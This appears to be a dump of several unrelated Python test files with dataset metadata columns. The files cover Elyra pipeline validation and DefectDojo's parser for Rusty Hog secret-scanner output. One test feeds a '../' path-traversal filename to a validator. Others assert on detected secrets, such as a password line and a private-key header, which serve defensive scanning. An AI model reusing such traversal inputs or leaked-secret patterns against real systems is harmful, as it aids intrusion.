pipeline_definition = PipelineDefinition(pipeline_definition=pipeline)
validation_manager._validate_pipeline_structure(pipeline_definition=pipeline_definition, response=response)
issues = response.to_json().get('issues')
assert len(issues) == 1
assert issues[0]['severity'] == 1
assert issues[0]['type'] == 'invalidPipeline'
assert issues[0]['message'] == 'Pipeline was last edited in a newer version of Elyra. '\
'Update Elyra to use this pipeline.'
def test_invalid_pipeline_version_that_needs_migration(validation_manager, load_pipeline):
pipeline, response = load_pipeline('generic_basic_pipeline_only_notebook.pipeline')
pipeline['pipelines'][0]['app_data']['version'] = 3
pipeline_definition = PipelineDefinition(pipeline_definition=pipeline)
validation_manager._validate_pipeline_structure(pipeline_definition=pipeline_definition, response=response)
issues = response.to_json().get('issues')
assert len(issues) == 1
assert issues[0]['severity'] == 1
assert issues[0]['type'] == 'invalidPipeline'
assert "needs to be migrated" in issues[0]['message']
def test_basic_pipeline_structure(validation_manager, load_pipeline):
pipeline, response = load_pipeline('generic_basic_pipeline_only_notebook.pipeline')
pipeline_definition = PipelineDefinition(pipeline_definition=pipeline)
validation_manager._validate_pipeline_structure(pipeline_definition=pipeline_definition, response=response)
assert not response.has_fatal
assert not response.to_json().get('issues')
def test_basic_pipeline_structure_with_scripts(validation_manager, load_pipeline):
pipeline, response = load_pipeline('generic_basic_pipeline_with_scripts.pipeline')
pipeline_definition = PipelineDefinition(pipeline_definition=pipeline)
validation_manager._validate_pipeline_structure(pipeline_definition=pipeline_definition, response=response)
assert not response.has_fatal
assert not response.to_json().get('issues')
@pytest.mark.parametrize('component_cache_instance', [KFP_COMPONENT_CACHE_INSTANCE], indirect=True)
async def test_invalid_runtime_node_kubeflow(validation_manager, load_pipeline, component_cache_instance):
pipeline, response = load_pipeline('kf_invalid_node_op.pipeline')
node_id = "eace43f8-c4b1-4a25-b331-d57d4fc29426"
pipeline_definition = PipelineDefinition(pipeline_definition=pipeline)
await validation_manager._validate_compatibility(pipeline_definition=pipeline_definition,
response=response,
pipeline_type='KUBEFLOW_PIPELINES',
pipeline_runtime='kfp')
issues = response.to_json().get('issues')
assert len(issues) == 1
assert issues[0]['severity'] == 1
assert issues[0]['type'] == 'invalidNodeType'
assert issues[0]['data']['nodeID'] == node_id
@pytest.mark.parametrize('component_cache_instance', [KFP_COMPONENT_CACHE_INSTANCE], indirect=True)
async def test_invalid_runtime_node_kubeflow_with_supernode(validation_manager,
load_pipeline,
component_cache_instance):
pipeline, response = load_pipeline('kf_invalid_node_op_with_supernode.pipeline')
node_id = "98aa7270-639b-42a4-9a07-b31cd0fa3205"
pipeline_id = "00304a2b-dec4-4a73-ab4a-6830f97d7855"
pipeline_definition = PipelineDefinition(pipeline_definition=pipeline)
await validation_manager._validate_compatibility(pipeline_definition=pipeline_definition,
response=response,
pipeline_type='KUBEFLOW_PIPELINES',
pipeline_runtime='kfp')
issues = response.to_json().get('issues')
print(issues)
assert len(issues) == 1
assert issues[0]['severity'] == 1
assert issues[0]['type'] == 'invalidNodeType'
assert issues[0]['data']['pipelineId'] == pipeline_id
assert issues[0]['data']['nodeID'] == node_id
async def test_invalid_pipeline_runtime_with_kubeflow_execution(validation_manager, load_pipeline):
pipeline, response = load_pipeline('generic_basic_pipeline_with_scripts.pipeline')
pipeline_definition = PipelineDefinition(pipeline_definition=pipeline)
await validation_manager._validate_compatibility(pipeline_definition=pipeline_definition,
response=response,
pipeline_type='APACHE_AIRFLOW',
pipeline_runtime='kfp')
issues = response.to_json().get('issues')
assert len(issues) == 1
assert issues[0]['severity'] == 1
assert issues[0]['type'] == 'invalidRuntime'
async def test_invalid_pipeline_runtime_with_local_execution(validation_manager, load_pipeline):
pipeline, response = load_pipeline('generic_basic_pipeline_with_scripts.pipeline')
pipeline_definition = PipelineDefinition(pipeline_definition=pipeline)
await validation_manager._validate_compatibility(pipeline_definition=pipeline_definition,
response=response,
pipeline_type='APACHE_AIRFLOW',
pipeline_runtime='local')
issues = response.to_json().get('issues')
assert len(issues) == 1
assert issues[0]['severity'] == 1
assert issues[0]['type'] == 'invalidRuntime'
assert issues[0]['data']['pipelineType'] == 'APACHE_AIRFLOW'
async def test_invalid_node_op_with_airflow(validation_manager, load_pipeline):
pipeline, response = load_pipeline('aa_invalid_node_op.pipeline')
node_id = "749d4641-cee8-4a50-a0ed-30c07439908f"
pipeline_definition = PipelineDefinition(pipeline_definition=pipeline)
await validation_manager._validate_compatibility(pipeline_definition=pipeline_definition,
response=response,
pipeline_type='APACHE_AIRFLOW',
pipeline_runtime='airflow')
issues = response.to_json().get('issues')
assert len(issues) == 1
assert issues[0]['severity'] == 1
assert issues[0]['type'] == 'invalidNodeType'
assert issues[0]['data']['nodeID'] == node_id
async def test_invalid_node_property_structure(monkeypatch, load_pipeline):
pipeline, response = load_pipeline('generic_invalid_node_property_structure.pipeline')
node_id = '88ab83dc-d5f0-443a-8837-788ed16851b7'
node_property = 'runtime_image'
pvm = PipelineValidationManager.instance()
monkeypatch.setattr(pvm, "_validate_filepath", lambda node_id, node_label,
property_name, filename, response: True)
monkeypatch.setattr(pvm, "_validate_label", lambda node_id, node_label,
response: True)
pipeline_definition = PipelineDefinition(pipeline_definition=pipeline)
await pvm._validate_node_properties(pipeline_definition=pipeline_definition,
response=response,
pipeline_type='GENERIC',
pipeline_runtime='kfp')
issues = response.to_json().get('issues')
assert len(issues) == 1
assert issues[0]['severity'] == 1
assert issues[0]['type'] == 'invalidNodeProperty'
assert issues[0]['data']['propertyName'] == node_property
assert issues[0]['data']['nodeID'] == node_id
@pytest.mark.parametrize('component_cache_instance', [KFP_COMPONENT_CACHE_INSTANCE], indirect=True)
async def test_missing_node_property_for_kubeflow_pipeline(monkeypatch, load_pipeline, component_cache_instance):
pipeline, response = load_pipeline('kf_invalid_node_property_in_component.pipeline')
node_id = 'fe08b42d-bd8c-4e97-8010-0503a3185427'
node_property = "notebook"
pvm = PipelineValidationManager.instance()
monkeypatch.setattr(pvm, "_validate_filepath", lambda node_id, file_dir, property_name, filename, response: True)
pipeline_definition = PipelineDefinition(pipeline_definition=pipeline)
await pvm._validate_node_properties(pipeline_definition=pipeline_definition,
response=response,
pipeline_type='KUBEFLOW_PIPELINES',
pipeline_runtime='kfp')
issues = response.to_json().get('issues')
assert len(issues) == 1
assert issues[0]['severity'] == 1
assert issues[0]['type'] == 'invalidNodeProperty'
assert issues[0]['data']['propertyName'] == node_property
assert issues[0]['data']['nodeID'] == node_id
def test_invalid_node_property_image_name(validation_manager, load_pipeline):
pipeline, response = load_pipeline('generic_invalid_node_property_image_name.pipeline')
node_ids = ['88ab83dc-d5f0-443a-8837-788ed16851b7', '7ae74ba6-d49f-48ea-9e4f-e44d13594b2f']
node_property = 'runtime_image'
for i, node_id in enumerate(node_ids):
node = pipeline['pipelines'][0]['nodes'][i]
node_label = node['app_data'].get('label')
image_name = node['app_data']['component_parameters'].get('runtime_image')
validation_manager._validate_container_image_name(node['id'], node_label, image_name, response)
issues = response.to_json().get('issues')
assert len(issues) == 2
# Test missing runtime image in node 0
assert issues[0]['severity'] == 1
assert issues[0]['type'] == 'invalidNodeProperty'
assert issues[0]['data']['propertyName'] == node_property
assert issues[0]['data']['nodeID'] == node_ids[0]
assert issues[0]['message'] == 'Required property value is missing.'
# Test invalid format for runtime image in node 1
assert issues[1]['severity'] == 1
assert issues[1]['type'] == 'invalidNodeProperty'
assert issues[1]['data']['propertyName'] == node_property
assert issues[1]['data']['nodeID'] == node_ids[1]
assert issues[1]['message'] == 'Node contains an invalid runtime image. Runtime image '\
'must conform to the format [registry/]owner/image:tag'
def test_invalid_node_property_image_name_list(validation_manager):
response = ValidationResponse()
node_label = "test_label"
node_id = "test-id"
failing_image_names = ["12345566:one-two-three",
"someregistry.io/some_org/some_tag/something/",
"docker.io//missing_org_name:test"]
for image_name in failing_image_names:
validation_manager._validate_container_image_name(node_id, node_label, image_name, response)
issues = response.to_json().get('issues')
assert len(issues) == len(failing_image_names)
def test_invalid_node_property_dependency_filepath_workspace(validation_manager):
response = ValidationResponse()
node = {"id": "test-id", "app_data": {"label": "test"}}
property_name = 'test-property'
validation_manager._validate_filepath(node_id=node['id'], file_dir=os.getcwd(),
property_name=property_name,
node_label=node['app_data']['label'],
filename='../invalid_filepath/to/file.ipynb',
response=response)
issues = response.to_json().get('issues')
assert issues[0]['severity'] == 1
assert issues[0]['type'] == 'invalidFilePath'
assert issues[0]['data']['propertyName'] == property_name
assert issues[0]['data']['nodeID'] == node['id']
def test_invalid_node_property_dependency_filepath_non_existent(validation_manager):
response = ValidationResponse()
node = {"id": "test-id", "app_data": {"label": "test"}}
property_name = 'test-property'
validation_manager._validate_filepath(node_id=node['id'], file_dir=os.getcwd(),
property_name=property_name,
node_label=node['app_data']['label'],
filename='invalid_filepath/to/file.ipynb',
response=response)
issues = response.to_json().get('issues')
assert issues[0]['severity'] == 1
assert issues[0]['type'] == 'invalidFilePath'
assert issues[0]['data']['propertyName'] == property_name
assert issues[0]['data']['nodeID'] == node['id']
def test_valid_node_property_dependency_filepath(validation_manager):
response = ValidationResponse()
valid_filename = os.path.join(os.path.dirname(__file__),
'resources/validation_pipelines/generic_single_cycle.pipeline')
node = {"id": "test-id", "app_data": {"label": "test"}}
property_name = 'test-property'
validation_manager._validate_filepath(node_id=node['id'], file_dir=os.getcwd(),
property_name=property_name,
node_label=node['app_data']['label'],
filename=valid_filename,
response=response)
assert not response.has_fatal
assert not response.to_json().get('issues')
async def test_valid_node_property_pipeline_filepath(monkeypatch, validation_manager, load_pipeline):
pipeline, response = load_pipeline('generic_basic_filepath_check.pipeline')
monkeypatch.setattr(validation_manager, "_validate_label", lambda node_id, node_label,
response: True)
pipeline_definition = PipelineDefinition(pipeline_definition=pipeline)
await validation_manager._validate_node_properties(pipeline_definition=pipeline_definition,
response=response,
pipeline_type='GENERIC',
pipeline_runtime='kfp')
assert not response.has_fatal
assert not response.to_json().get('issues')
def test_invalid_node_property_resource_value(validation_manager, load_pipeline):
pipeline, response = load_pipeline('generic_invalid_node_property_hardware_resources.pipeline')
node_id = '88ab83dc-d5f0-443a-8837-788ed16851b7'
node = pipeline['pipelines'][0]['nodes'][0]
validation_manager._validate_resource_value(node['id'], node['app_data']['label'],
resource_name='memory',
resource_value=node['app_data']['component_parameters']['memory'],
response=response)
issues = response.to_json().get('issues')
assert len(issues) == 1
assert issues[0]['severity'] == 1
assert issues[0]['type'] == 'invalidNodeProperty'
assert issues[0]['data']['propertyName'] == 'memory'
assert issues[0]['data']['nodeID'] == node_id
def test_invalid_node_property_env_var(validation_manager):
response = ValidationResponse()
node = {"id": "test-id", "app_data": {"label": "test"}}
invalid_env_var = "TEST_ENV_ONE\"test_one\""
validation_manager._validate_environmental_variables(node_id=node['id'],
node_label=node['app_data']['label'],
env_var=invalid_env_var,
response=response)
issues = response.to_json().get('issues')
assert issues[0]['severity'] == 1
assert issues[0]['type'] == 'invalidEnvPair'
assert issues[0]['data']['propertyName'] == 'env_vars'
assert issues[0]['data']['nodeID'] == "test-id"
def test_valid_node_property_label(validation_manager):
response = ValidationResponse()
node = {"id": "test-id"}
valid_label_name = "dead-bread-dead-bread-dead-bread-dead-bread-dead-bread-dead-bre"
validation_manager._validate_label(node_id=node['id'],
node_label=valid_label_name,
response=response)
issues = response.to_json().get('issues')
assert len(issues) == 0
def test_valid_node_property_label_min_length(validation_manager):
response = ValidationResponse()
node = {"id": "test-id", "app_data": {"label": "test"}}
valid_label_name = "d"
validation_manager._validate_label(node_id=node['id'],
node_label=valid_label_name,
response=response)
issues = response.to_json().get('issues')
assert len(issues) == 0
def test_invalid_node_property_label_filename_exceeds_max_length(validation_manager):
response = ValidationResponse()
node = {"id": "test-id", "app_data": {"label": "test"}}
valid_label_name = "deadbread-deadbread-deadbread-deadbread-deadbread-deadbread-de.py"
validation_manager._validate_label(node_id=node['id'],
node_label=valid_label_name,
response=response)
issues = response.to_json().get('issues')
assert len(issues) == 2
def test_invalid_node_property_label_max_length(validation_manager):
response = ValidationResponse()
node = {"id": "test-id", "app_data": {"label": "test"}}
invalid_label_name = "dead-bread-dead-bread-dead-bread-dead-bread-dead-bread-dead-bred"
validation_manager._validate_label(node_id=node['id'],
node_label=invalid_label_name,
response=response)
issues = response.to_json().get('issues')
assert len(issues) == 1
assert issues[0]['severity'] == 2
assert issues[0]['type'] == 'invalidNodeLabel'
assert issues[0]['data']['propertyName'] == 'label'
assert issues[0]['data']['nodeID'] == "test-id"
def test_valid_node_property_label_filename_has_relative_path(validation_manager):
response = ValidationResponse()
node = {"id": "test-id", "app_data": {"label": "test"}}
valid_label_name = "deadbread.py"
validation_manager._validate_label(node_id=node['id'],
node_label=valid_label_name,
response=response)
issues = response.to_json().get('issues')
assert len(issues) == 0
def test_invalid_node_property_label_bad_characters(validation_manager):
response = ValidationResponse()
node = {"id": "test-id"}
invalid_label_name = "bad_label_*&^&$"
validation_manager._validate_label(node_id=node['id'],
node_label=invalid_label_name,
response=response)
issues = response.to_json().get('issues')
assert len(issues) == 1
assert issues[0]['severity'] == 2
assert issues[0]['type'] == 'invalidNodeLabel'
assert issues[0]['data']['propertyName'] == 'label'
assert issues[0]['data']['nodeID'] == "test-id"
def test_pipeline_graph_single_cycle(validation_manager, load_pipeline):
pipeline, response = load_pipeline('generic_single_cycle.pipeline')
# cycle_ID = ['c309f6dd-b022-4b1c-b2b0-b6449bb26e8f', '8cb986cb-4fc9-4b1d-864d-0ec64b7ac13c']
validation_manager._validate_pipeline_graph(pipeline=pipeline,
response=response)
issues = response.to_json().get('issues')
assert len(issues) == 1
assert issues[0]['severity'] == 1
assert issues[0]['type'] == 'circularReference'
# assert issues[0]['data']['linkIDList'].sort() == cycle_ID.sort()
def test_pipeline_graph_double_cycle(validation_manager, load_pipeline):
pipeline, response = load_pipeline('generic_double_cycle.pipeline')
# cycle_ID = ['597b2971-b95d-4df7-a36d-9d93b0345298', 'b63378e4-9085-4a33-9330-6f86054681f4']
# cycle_two_ID = ['c309f6dd-b022-4b1c-b2b0-b6449bb26e8f', '8cb986cb-4fc9-4b1d-864d-0ec64b7ac13c']
validation_manager._validate_pipeline_graph(pipeline=pipeline,
response=response)
issues = response.to_json().get('issues')
assert len(issues) == 1
assert issues[0]['severity'] == 1
assert issues[0]['type'] == 'circularReference'
# assert issues[0]['data']['linkIDList'].sort() == cycle_ID.sort()
# assert issues[1]['severity'] == 1
# assert issues[1]['type'] == 'circularReference'
# assert issues[1]['data']['linkIDList'].sort() == cycle_two_ID.sort()
def test_pipeline_graph_singleton(validation_manager, load_pipeline):
pipeline, response = load_pipeline('generic_singleton.pipeline')
node_id = '0195fefd-3ceb-4a90-a12c-3958ef0ff42e'
validation_manager._validate_pipeline_graph(pipeline=pipeline,
response=response)
issues = response.to_json().get('issues')
assert len(issues) == 1
assert not response.has_fatal
assert issues[0]['severity'] == 2
assert issues[0]['type'] == 'singletonReference'
assert issues[0]['data']['nodeID'] == node_id
def test_pipeline_valid_kfp_with_supernode(validation_manager, load_pipeline):
pipeline, response = load_pipeline('kf_supernode_valid.pipeline')
validation_manager._validate_pipeline_graph(pipeline=pipeline,
response=response)
issues = response.to_json().get('issues')
assert len(issues) == 0
assert not response.has_fatal
def test_pipeline_invalid_single_cycle_kfp_with_supernode(validation_manager, load_pipeline):
pipeline, response = load_pipeline('kf_supernode_invalid_single_cycle.pipeline')
validation_manager._validate_pipeline_graph(pipeline=pipeline,
response=response)
issues = response.to_json().get('issues')
assert len(issues) == 1
assert response.has_fatal
assert issues[0]['severity'] == 1
assert issues[0]['type'] == 'circularReference'
@pytest.mark.parametrize('component_cache_instance', [KFP_COMPONENT_CACHE_INSTANCE], indirect=True)
async def test_pipeline_kfp_inputpath_parameter(validation_manager, load_pipeline, component_cache_instance):
pipeline, response = load_pipeline('kf_inputpath_parameter.pipeline')
pipeline_definition = PipelineDefinition(pipeline_definition=pipeline)
await validation_manager._validate_node_properties(pipeline_definition=pipeline_definition,
response=response,
pipeline_type='KUBEFLOW_PIPELINES',
pipeline_runtime='kfp')
issues = response.to_json().get('issues')
assert len(issues) == 0
@pytest.mark.parametrize('component_cache_instance', [KFP_COMPONENT_CACHE_INSTANCE], indirect=True)
async def test_pipeline_invalid_kfp_inputpath_parameter(validation_manager,
load_pipeline,
component_cache_instance):
invalid_key_node_id = "089a12df-fe2f-4fcb-ae37-a1f8a6259ca1"
missing_param_node_id = "e8820c55-dc79-46d1-b32e-924fa5d70d2a"
pipeline, response = load_pipeline('kf_invalid_inputpath_parameter.pipeline')
pipeline_definition = PipelineDefinition(pipeline_definition=pipeline)
await validation_manager._validate_node_properties(pipeline_definition=pipeline_definition,
response=response,
pipeline_type='KUBEFLOW_PIPELINES',
pipeline_runtime='kfp')
issues = response.to_json().get('issues')
assert len(issues) == 2
assert response.has_fatal
assert issues[0]['severity'] == 1
assert issues[0]['type'] == 'invalidNodeProperty'
assert issues[0]['data']['nodeID'] == invalid_key_node_id
assert issues[1]['severity'] == 1
assert issues[1]['type'] == 'invalidNodeProperty'
assert issues[1]['data']['nodeID'] == missing_param_node_id
@pytest.mark.parametrize('component_cache_instance', [KFP_COMPONENT_CACHE_INSTANCE], indirect=True)
async def test_pipeline_invalid_kfp_inputpath_missing_connection(validation_manager,
load_pipeline,
component_cache_instance):
invalid_node_id = "5b78ea0a-e5fc-4022-94d4-7b9dc170d794"
pipeline, response = load_pipeline('kf_invalid_inputpath_missing_connection.pipeline')
pipeline_definition = PipelineDefinition(pipeline_definition=pipeline)
await validation_manager._validate_node_properties(pipeline_definition=pipeline_definition,
response=response,
pipeline_type='KUBEFLOW_PIPELINES',
pipeline_runtime='kfp')
issues = response.to_json().get('issues')
assert len(issues) == 1
assert response.has_fatal
assert issues[0]['severity'] == 1
assert issues[0]['type'] == 'invalidNodeProperty'
assert issues[0]['data']['nodeID'] == invalid_node_id
@pytest.mark.parametrize('component_cache_instance', [AIRFLOW_COMPONENT_CACHE_INSTANCE], indirect=True)
async def test_pipeline_aa_parent_node_missing_xcom_push(validation_manager,
load_pipeline,
component_cache_instance):
invalid_node_id = 'b863d458-21b5-4a46-8420-5a814b7bd525'
invalid_operator = 'BashOperator'
pipeline, response = load_pipeline('aa_parent_node_missing_xcom.pipeline')
pipeline_definition = PipelineDefinition(pipeline_definition=pipeline)
await validation_manager._validate_node_properties(pipeline_definition=pipeline_definition,
response=response,
pipeline_type='APACHE_AIRFLOW',
pipeline_runtime='airflow')
issues = response.to_json().get('issues')
assert len(issues) == 1
assert response.has_fatal
assert issues[0]['severity'] == 1
assert issues[0]['type'] == 'invalidNodeProperty'
assert issues[0]['data']['nodeID'] == invalid_node_id
assert issues[0]['data']['parentNodeID'] == invalid_operator
| 48.89934
| 117
| 0.653326
| 3,095
| 29,633
| 5.95832
| 0.110178
| 0.059867
| 0.057101
| 0.02733
| 0.802397
| 0.76818
| 0.75061
| 0.731522
| 0.719755
| 0.701752
| 0
| 0.026134
| 0.240745
| 29,633
| 605
| 118
| 48.980165
| 0.793502
| 0.040394
| 0
| 0.683406
| 0
| 0.004367
| 0.170961
| 0.075431
| 0
| 0
| 0
| 0
| 0.283843
| 1
| 0.054585
| false
| 0
| 0.019651
| 0
| 0.076419
| 0.002183
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 6
|
b2caa5e05898f9af61dd2127cdd25861fa8ba33e
| 48
|
py
|
Python
|
src/widgets/js_interface.py
|
charlestian/NetEaseMusic
|
5d8fa4747fcecabb5a09174ff6838718d62c2b31
|
[
"MIT"
] | 19
|
2015-04-18T15:16:58.000Z
|
2021-04-12T06:19:48.000Z
|
src/widgets/js_interface.py
|
charlestian/NetEaseMusic
|
5d8fa4747fcecabb5a09174ff6838718d62c2b31
|
[
"MIT"
] | null | null | null |
src/widgets/js_interface.py
|
charlestian/NetEaseMusic
|
5d8fa4747fcecabb5a09174ff6838718d62c2b31
|
[
"MIT"
] | 12
|
2015-04-18T15:16:59.000Z
|
2016-04-20T17:22:58.000Z
|
# -*- coding: utf8 -*-
def js_test():
pass
| 9.6
| 22
| 0.5
| 6
| 48
| 3.833333
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.028571
| 0.270833
| 48
| 5
| 23
| 9.6
| 0.628571
| 0.416667
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.5
| true
| 0.5
| 0
| 0
| 0.5
| 0
| 1
| 1
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 1
| 1
| 0
| 0
| 0
| 0
|
0
| 6
|
b2e06e63daa5c48b0b71e14d79ded7d54d194008
| 192
|
py
|
Python
|
ssl_framework/models/__init__.py
|
ananyahjha93/libself
|
f43cf8d60db97bb47652eecf06efa1801e850b9f
|
[
"MIT"
] | 11
|
2020-02-14T21:29:45.000Z
|
2021-07-30T18:49:47.000Z
|
ssl_framework/models/__init__.py
|
ananyahjha93/libself
|
f43cf8d60db97bb47652eecf06efa1801e850b9f
|
[
"MIT"
] | null | null | null |
ssl_framework/models/__init__.py
|
ananyahjha93/libself
|
f43cf8d60db97bb47652eecf06efa1801e850b9f
|
[
"MIT"
] | 2
|
2020-10-21T08:11:12.000Z
|
2020-11-20T11:57:43.000Z
|
from ssl_framework.models.abstract_image_model import AbstractImageModel
from ssl_framework.models.jigsaw_image_model import JigsawImageModel
MODELS = {'jigsaw_image_model': JigsawImageModel}
| 48
| 72
| 0.885417
| 23
| 192
| 7.043478
| 0.478261
| 0.185185
| 0.197531
| 0.271605
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.0625
| 192
| 4
| 73
| 48
| 0.9
| 0
| 0
| 0
| 0
| 0
| 0.093264
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0.666667
| 0
| 0.666667
| 0
| 1
| 0
| 0
| null | 0
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
|
0
| 6
|
b2e7573fa0f891e845e390e8c0f61b291ad3a46d
| 7,913
|
py
|
Python
|
unittests/tools/test_rusty_hog_parser.py
|
dant24/django-DefectDojo
|
caf5c91b3f8870d5f466dfaaf5a3a096f8812ad9
|
[
"BSD-3-Clause"
] | 249
|
2016-09-06T21:04:40.000Z
|
2018-01-19T15:59:44.000Z
|
unittests/tools/test_rusty_hog_parser.py
|
dant24/django-DefectDojo
|
caf5c91b3f8870d5f466dfaaf5a3a096f8812ad9
|
[
"BSD-3-Clause"
] | 255
|
2016-09-06T21:36:37.000Z
|
2018-01-19T19:57:57.000Z
|
unittests/tools/test_rusty_hog_parser.py
|
dant24/django-DefectDojo
|
caf5c91b3f8870d5f466dfaaf5a3a096f8812ad9
|
[
"BSD-3-Clause"
] | 152
|
2016-09-06T21:04:54.000Z
|
2018-01-18T08:52:24.000Z
|
from ..dojo_test_case import DojoTestCase
from dojo.tools.rusty_hog.parser import RustyhogParser
from dojo.models import Test
class TestRustyhogParser(DojoTestCase):
def test_parse_file_with_no_vuln_has_no_finding_choctawhog(self):
testfile = open("unittests/scans/rusty_hog/choctawhog_no_vuln.json")
parser = RustyhogParser()
findings = parser.get_items(testfile, "Rusty Hog", Test()) # The outputfile is empty. A subscanner can't be classified
self.assertEqual(0, len(findings))
def test_parse_file_with_one_vuln_has_one_finding_choctawhog(self):
testfile = open("unittests/scans/rusty_hog/choctawhog_one_vuln.json")
parser = RustyhogParser()
findings = parser.get_items(testfile, "Choctaw Hog", Test())
self.assertEqual(1, len(findings))
def test_parse_file_with_multiple_vuln_has_multiple_finding_choctawhog(self):
testfile = open("unittests/scans/rusty_hog/choctawhog_many_vulns.json")
parser = RustyhogParser()
findings = parser.get_items(testfile, "Choctaw Hog", Test())
self.assertEqual(13, len(findings))
def test_parse_file_with_multiple_vuln_has_multiple_finding_choctawhog_content(self):
testfile = open("unittests/scans/rusty_hog/choctawhog_many_vulns.json")
parser = RustyhogParser()
findings = parser.get_items(testfile, "Choctaw Hog", Test())
self.assertEqual(findings[0].title, "Email address found in Git path .github/workflows/main.yml (a7bce96377c4ff2ac16cd51fb0da7fe7ea678829)")
self.assertIn("**This string was found:** ['dojo-helpers@this-repo.com']", findings[0].description)
self.assertIn("**Commit message:** removing action", findings[0].description)
self.assertIn("**Commit hash:** a7bce96377c4ff2ac16cd51fb0da7fe7ea678829", findings[0].description)
self.assertIn("**Parent commit hash:** d8b2f39e826321896a3c7c474fc40dfc0d1fc586", findings[0].description)
self.assertIn("**Old and new file IDs:** 2aba123d6e872777c8cf39ee34664d70e0b90ff0 - 0000000000000000000000000000000000000000", findings[0].description)
self.assertIn("**Date:** 2020-04-15 12:47:20", findings[0].description)
self.assertIn("Please ensure no secret material nor confidential information is kept in clear within git repositories.", findings[0].mitigation)
def test_parse_file_with_no_vuln_has_no_finding_duorchog(self):
testfile = open("unittests/scans/rusty_hog/durochog_no_vuln.json")
parser = RustyhogParser()
findings = parser.get_items(testfile, "Rusty Hog", Test()) # The outputfile is empty. A subscanner can't be classified
self.assertEqual(0, len(findings))
def test_parse_file_with_one_vuln_has_one_finding_durochog(self):
testfile = open("unittests/scans/rusty_hog/durochog_one_vuln.json")
parser = RustyhogParser()
findings = parser.get_items(testfile, "Duroc Hog", Test())
self.assertEqual(1, len(findings))
def test_parse_file_with_multiple_vuln_has_multiple_finding_durochog(self):
testfile = open("unittests/scans/rusty_hog/durochog_many_vulns.json")
parser = RustyhogParser()
findings = parser.get_items(testfile, "Duroc Hog", Test())
self.assertEqual(4, len(findings))
def test_parse_file_with_multiple_vuln_has_multiple_finding_durochog_content(self):
testfile = open("unittests/scans/rusty_hog/durochog_many_vulns.json")
parser = RustyhogParser()
findings = parser.get_items(testfile, "Duroc Hog", Test())
self.assertEqual(findings[0].title, "password (Password) found in path /scan_folder/unittests/scans/sonarqube/sonar-no-finding.html")
self.assertIn("**This string was found:** ['password = getEncryptedPass()']", findings[0].description)
self.assertIn("**Path of Issue:** /scan_folder/unittests/scans/sonarqube/sonar-no-finding.html", findings[0].description)
self.assertIn("**Linenum of Issue:** 7712", findings[0].description)
self.assertIn("**Diff:** $password = getEncryptedPass();", findings[0].description)
self.assertIn("Please ensure no secret material nor confidential information is kept in clear within directories, files, and archives.", findings[0].mitigation)
def test_parse_file_with_no_vuln_has_no_finding_gottingenhog(self):
testfile = open("unittests/scans/rusty_hog/gottingenhog_no_vuln.json")
parser = RustyhogParser()
findings = parser.get_items(testfile, "Rusty Hog", Test()) # The outputfile is empty. A subscanner can't be classified
self.assertEqual(0, len(findings))
def test_parse_file_with_one_vuln_has_one_finding_gottingenhog(self):
testfile = open("unittests/scans/rusty_hog/gottingenhog_one_vuln.json")
parser = RustyhogParser()
findings = parser.get_items(testfile, "Gottingen Hog", Test())
self.assertEqual(1, len(findings))
def test_parse_file_with_multiple_vuln_has_multiple_finding_gottingenhog(self):
testfile = open("unittests/scans/rusty_hog/gottingenhog_many_vulns.json")
parser = RustyhogParser()
findings = parser.get_items(testfile, "Gottingen Hog", Test())
self.assertEqual(10, len(findings))
def test_parse_file_with_multiple_vuln_has_multiple_finding_gottingenhog_content(self):
testfile = open("unittests/scans/rusty_hog/gottingenhog_many_vulns.json")
parser = RustyhogParser()
findings = parser.get_items(testfile, "Gottingen Hog", Test())
self.assertEqual(findings[0].title, "password found in Jira ID TEST-123 (Issue Description)")
self.assertIn("**This string was found:** ['password: jeans']", findings[0].description)
self.assertIn("**JIRA Issue ID:** TEST-123", findings[0].description)
self.assertIn("**JIRA location:** Issue Description", findings[0].description)
self.assertIn("**JIRA url:** https://jira.com/browse/TEST-123", findings[0].description)
self.assertIn("Please ensure no secret material nor confidential information is kept in clear within JIRA Tickets.", findings[0].mitigation)
def test_parse_file_with_no_vuln_has_no_finding_essexhog(self):
testfile = open("unittests/scans/rusty_hog/essexhog_no_vuln.json")
parser = RustyhogParser()
findings = parser.get_items(testfile, "Rusty Hog", Test()) # The outputfile is empty. A subscanner can't be classified
self.assertEqual(0, len(findings))
def test_parse_file_with_one_vuln_has_one_finding_essexhog(self):
testfile = open("unittests/scans/rusty_hog/essexhog_one_vuln.json")
parser = RustyhogParser()
findings = parser.get_items(testfile, "Essex Hog", Test())
self.assertEqual(1, len(findings))
def test_parse_file_with_multiple_vuln_has_multiple_finding_essexhog(self):
testfile = open("unittests/scans/rusty_hog/essexhog_many_vulns.json")
parser = RustyhogParser()
findings = parser.get_items(testfile, "Essex Hog", Test())
self.assertEqual(3, len(findings))
def test_parse_file_with_multiple_vuln_has_multiple_finding_essexhog_content(self):
testfile = open("unittests/scans/rusty_hog/essexhog_many_vulns.json")
parser = RustyhogParser()
findings = parser.get_items(testfile, "Essex Hog", Test())
self.assertEqual(findings[0].title, "SSH (EC) private key found in Confluence Page ID 12345")
self.assertIn("-----BEGIN EC PRIVATE KEY-----", findings[0].description)
self.assertIn("**Confluence URL:** https://confluence.com/pages/viewpage.action?pageId=12345", findings[0].description)
self.assertIn("**Confluence Page ID:** 12345", findings[0].description)
self.assertIn("Please ensure no secret material nor confidential information is kept in clear within Confluence Pages.", findings[0].mitigation)
| 64.333333
| 168
